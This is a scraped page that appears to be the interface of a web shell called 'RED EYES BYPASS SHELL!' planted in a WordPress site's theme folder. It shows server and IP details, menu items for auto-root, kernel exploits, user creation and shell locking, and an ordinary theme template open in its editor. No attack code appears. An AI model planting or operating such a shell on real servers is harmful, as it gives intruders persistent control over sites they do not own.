Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
wp900 /
QAtest /
wp-content /
themes /
emerge-blog /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
404.php
1004
B
-rw-r--r--
archive.php
1.61
KB
-rw-r--r--
comments.php
1.95
KB
-rw-r--r--
footer.php
1.14
KB
-rw-r--r--
functions.php
10.6
KB
-rw-r--r--
header.php
2.52
KB
-rw-r--r--
index.php
1.86
KB
-rw-r--r--
page.php
1.07
KB
-rw-r--r--
readme.txt
2.42
KB
-rw-r--r--
screenshot.png
202.79
KB
-rw-r--r--
search.php
1.87
KB
-rw-r--r--
sidebar.php
370
B
-rw-r--r--
single.php
1.61
KB
-rw-r--r--
style.css
55.52
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : single.php
<?php /** * The template for displaying all single posts * * @link https://developer.wordpress.org/themes/basics/template-hierarchy/#single-post * * @package emerge_blog */ get_header(); ?> <div id="content-wrap" class="container"> <div id="primary" class="content-area"> <main id="main" class="site-main"> <div class="single-post-wrap"> <?php while ( have_posts() ) : the_post(); get_template_part( 'template-parts/content', 'single' ); the_post_navigation( array( 'prev_text' => '<span class="screen-reader-text">' . __( 'Previous Post', 'emerge-blog' ) . '</span><span aria-hidden="true" class="nav-subtitle">' . __( 'Previous', 'emerge-blog' ) . '</span> <span class="nav-title"><span class="nav-title-icon-wrapper">' . emerge_blog_get_svg( array( 'icon' => 'arrow-left' ) ) . '</span>%title</span>', 'next_text' => '<span class="screen-reader-text">' . __( 'Next Post', 'emerge-blog' ) . '</span><span aria-hidden="true" class="nav-subtitle">' . __( 'Next', 'emerge-blog' ) . '</span> <span class="nav-title">%title<span class="nav-title-icon-wrapper">' . emerge_blog_get_svg( array( 'icon' => 'arrow-right' ) ) . '</span></span>', ) ); // If comments are open or we have at least one comment, load up the comment template. if ( comments_open() || get_comments_number() ) : comments_template(); endif; endwhile; // End of the loop. ?> </div><!-- .single-post-wrap --> </main><!-- #main --> </div><!-- #primary --> <?php get_sidebar(); ?> </div><!-- .container --> <?php get_footer();
Close